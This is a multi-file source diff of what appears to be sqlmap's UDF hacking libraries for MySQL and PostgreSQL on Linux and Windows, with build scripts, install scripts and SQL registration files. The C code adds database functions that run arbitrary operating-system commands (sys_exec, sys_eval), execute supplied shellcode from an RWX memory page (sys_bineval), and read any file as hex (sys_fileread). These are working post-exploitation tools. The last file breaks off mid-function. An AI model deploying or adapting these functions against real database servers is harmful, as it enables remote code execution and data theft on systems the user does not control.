         email: roland.bouman@gmail.com, bernardo.damele@gmail.com
 
@@ -25,9 +25,11 @@ DROP FUNCTION IF EXISTS sys_get;
 DROP FUNCTION IF EXISTS sys_set;
 DROP FUNCTION IF EXISTS sys_exec;
 DROP FUNCTION IF EXISTS sys_eval;
+DROP FUNCTION IF EXISTS sys_bineval;
 
 CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
 CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
 CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
 CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
 CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
+CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';

extra/udfhack/linux/lib_postgresqludf_sys/Makefile

@@ -0,0 +1,16 @@
+LIBDIR=/tmp
+
+8.4:
+	gcc -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.3:
+	gcc -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.2:
+	gcc -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/udfhack/linux/lib_postgresqludf_sys/install.sh

@@ -1,6 +1,6 @@
 #!/bin/bash
 # lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2009  Bernardo Damele A. G.
+# Copyright (C) 2009-2010  Bernardo Damele A. G.
 # web: http://bernardodamele.blogspot.com/
 # email: bernardo.damele@gmail.com
 # 
@@ -19,9 +19,13 @@
 # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 
 # Adapt the following settings to your environment
-PORT="5432"
-VERSION="8.3"
 USER="postgres"
+PORT="5434"
+VERSION="8.4"
+#PORT="5433"
+#VERSION="8.3"
+#PORT="5432"
+#VERSION="8.2"
 
 echo "Compiling the PostgreSQL UDF"
 make ${VERSION}
@@ -32,8 +36,10 @@ if test $? -ne 0; then
 
 	if test "${VERSION}" == "8.2"; then
 		echo "apt-get install postgresql-server-dev-8.2"
-	else
+	elif test "${VERSION}" == "8.3"; then
 		echo "apt-get install postgresql-server-dev-8.3"
+	elif test "${VERSION}" == "8.4"; then
+		echo "apt-get install postgresql-server-dev-8.4"
 	fi
 
 	exit 1

extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -0,0 +1,274 @@
+/* 
+	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
+	web: http://bernardodamele.blogspot.com/
+	email: bernardo.damele@gmail.com
+	
+	This library is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#define _USE_32BIT_TIME_T
+#define DLLEXP __declspec(dllexport) 
+#define BUILDING_DLL 1
+#else
+#define DLLEXP
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+#include <postgres.h>
+#include <fmgr.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <ctype.h>
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
+#ifdef PG_MODULE_MAGIC
+PG_MODULE_MAGIC;
+#endif
+
+PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	int32 argv0_size;
+	int32 result = 0;
+	char *command;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	command = (char *)malloc(argv0_size + 1);
+
+	memcpy(command, VARDATA(argv0), argv0_size);
+	command[argv0_size] = '\0';
+
+	/*
+	Only if you want to log
+	elog(NOTICE, "Command execution: %s", command);
+	*/
+
+	result = system(command);
+	free(command);
+
+	PG_FREE_IF_COPY(argv0, 0);
+	PG_RETURN_INT32(result);
+}
+
+PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	char *command;
+	char *result;
+	FILE *pipe;
+	char line[1024];
+	int32 outlen, linelen;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	command = (char *)malloc(argv0_size + 1);
+
+	memcpy(command, VARDATA(argv0), argv0_size);
+	command[argv0_size] = '\0';
+
+	/*
+	Only if you want to log
+	elog(NOTICE, "Command evaluated: %s", command);
+	*/
+
+	result = (char *)malloc(1);
+	outlen = 0;
+
+	pipe = popen(command, "r");
+
+	while (fgets(line, sizeof(line), pipe) != NULL) {
+		linelen = strlen(line);
+		result = (char *)realloc(result, outlen + linelen);
+		strncpy(result + outlen, line, linelen);
+		outlen = outlen + linelen;
+	}
+
+	pclose(pipe);
+
+	if (*result) {
+		result[outlen-1] = 0x00;
+	}
+
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+
+	PG_RETURN_POINTER(result_text);
+}
+
+PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, VARDATA(argv0), len);
+
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		PG_RETURN_INT32(1);
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			PG_RETURN_INT32(1);
+
+		strncpy((char *)addr, VARDATA(argv0), len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	PG_RETURN_INT32(0);
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}

extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.sql

@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -21,3 +21,5 @@
 
 CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
 CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

extra/udfhack/windows/README.txt

@@ -0,0 +1,25 @@
+Before compiling, certain enviroment variables have to be set,
+depending on the project used. For project lib_mysqludf_sys variables
+PLATFORM_SDK_DIR and MYSQL_SERVER_DIR have to be set, while for project
+lib_postgresqludf_sys variables PLATFORM_SDK_DIR and
+POSTGRESQL_SERVER_DIR.
+
+Variables:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
+MYSQL_SERVER_DIR		Directory where the MySQL is installed
+POSTGRESQL_SERVER_DIR	Directory where the PostgreSQL is installed
+
+Procedure for setting environment variables:
+My Computer -> Properties -> Advanced -> Environment Variables
+User variables -> New
+
+Sample values:
+--------------------------------------------------------------------------
+Variable name			Variable value
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
+MYSQL_SERVER_DIR		C:\Program Files\MySQL\MySQL Server 5.1
+POSTGRESQL_SERVER_DIR	C:\Program Files\PostgreSQL\8.4

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_mysqludf_sys", "lib_mysqludf_sys\lib_mysqludf_sys.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,7 +1,7 @@
 /* 
 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 	web: http://www.mysqludf.org/
 	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 	
@@ -23,6 +23,9 @@
 #define DLLEXP __declspec(dllexport) 
 #else
 #define DLLEXP
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
 #endif
 
 #ifdef STANDARD
@@ -191,6 +194,33 @@ char* sys_eval(
 ,	char *error
 );
 
+/**
+ * sys_bineval
+ * 
+ * executes bynary opcodes.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+DLLEXP 
+void sys_bineval_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
 
 #ifdef	__cplusplus
 }
@@ -216,10 +246,12 @@ my_bool lib_mysqludf_sys_info_init(
 	}
 	return status;
 }
+
 void lib_mysqludf_sys_info_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* lib_mysqludf_sys_info(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -250,10 +282,12 @@ my_bool sys_get_init(
 		return 1;
 	}
 }
+
 void sys_get_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* sys_get(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -305,6 +339,7 @@ my_bool sys_set_init(
 	}	
 	return 0;
 }
+
 void sys_set_deinit(
 	UDF_INIT *initid
 ){
@@ -312,6 +347,7 @@ void sys_set_deinit(
 		free(initid->ptr);
 	}
 }
+
 long long sys_set(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -352,10 +388,12 @@ my_bool sys_exec_init(
 		return 1;
 	}
 }
+
 void sys_exec_deinit(
 	UDF_INIT *initid
 ){
 }
+
 my_ulonglong sys_exec(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -382,10 +420,12 @@ my_bool sys_eval_init(
 		return 1;
 	}
 }
+
 void sys_eval_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* sys_eval(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -422,5 +462,90 @@ char* sys_eval(
 	return result;
 }
 
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	return 0;
+}
+
+void sys_bineval_deinit(
+	UDF_INIT *initid
+){
+	
+}
+
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = strlen(args->args[0]);
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, args->args[0], len);
+
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		return 1;
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			return 1;
+
+		strncpy((char *)addr, args->args[0], len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	return 0;
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
 
 #endif /* HAVE_DLOPEN */

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.vcproj

@@ -0,0 +1,192 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_mysqludf_sys"
+	ProjectGUID="{4D362A3E-CA53-444C-B1C8-C49641823875}"
+	RootNamespace="lib_mysqludf_sys"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib"
+				GenerateDebugInformation="false"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_mysqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_postgresqludf_sys", "lib_postgresqludf_sys\lib_postgresqludf_sys.vcproj", "{3527D58C-177A-47B3-981B-8104EBB3F943}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.ActiveCfg = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.Build.0 = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.ActiveCfg = Release|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -0,0 +1,274 @@
+/* 
+	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
+	web: http://bernardodamele.blogspot.com/
+	email: bernardo.damele@gmail.com
+	
+	This library is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#define _USE_32BIT_TIME_T
+#define DLLEXP __declspec(dllexport) 
+#define BUILDING_DLL 1
+#else
+#define DLLEXP
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+#include <postgres.h>
+#include <fmgr.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <ctype.h>
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
+#ifdef PG_MODULE_MAGIC
+PG_MODULE_MAGIC;
+#endif
+
+PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	int32 argv0_size;
+	int32 result = 0;
+	char *command;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	command = (char *)malloc(argv0_size + 1);
+
+	memcpy(command, VARDATA(argv0), argv0_size);
+	command[argv0_size] = '\0';
+
+	/*
+	Only if you want to log
+	elog(NOTICE, "Command execution: %s", command);
+	*/
+
+	result = system(command);
+	free(command);
+
+	PG_FREE_IF_COPY(argv0, 0);
+	PG_RETURN_INT32(result);
+}
+
+PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	char *command;
+	char *result;
+	FILE *pipe;
+	char line[1024];
+	int32 outlen, linelen;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	command = (char *)malloc(argv0_size + 1);
+
+	memcpy(command, VARDATA(argv0), argv0_size);
+	command[argv0_size] = '\0';
+
+	/*
+	Only if you want to log
+	elog(NOTICE, "Command evaluated: %s", command);
+	*/
+
+	result = (char *)malloc(1);
+	outlen = 0;
+
+	pipe = popen(command, "r");
+
+	while (fgets(line, sizeof(line), pipe) != NULL) {
+		linelen = strlen(line);
+		result = (char *)realloc(result, outlen + linelen);
+		strncpy(result + outlen, line, linelen);
+		outlen = outlen + linelen;
+	}
+
+	pclose(pipe);
+
+	if (*result) {
+		result[outlen-1] = 0x00;
+	}
+
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+
+	PG_RETURN_POINTER(result_text);
+}
+
+PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, VARDATA(argv0), len);
+
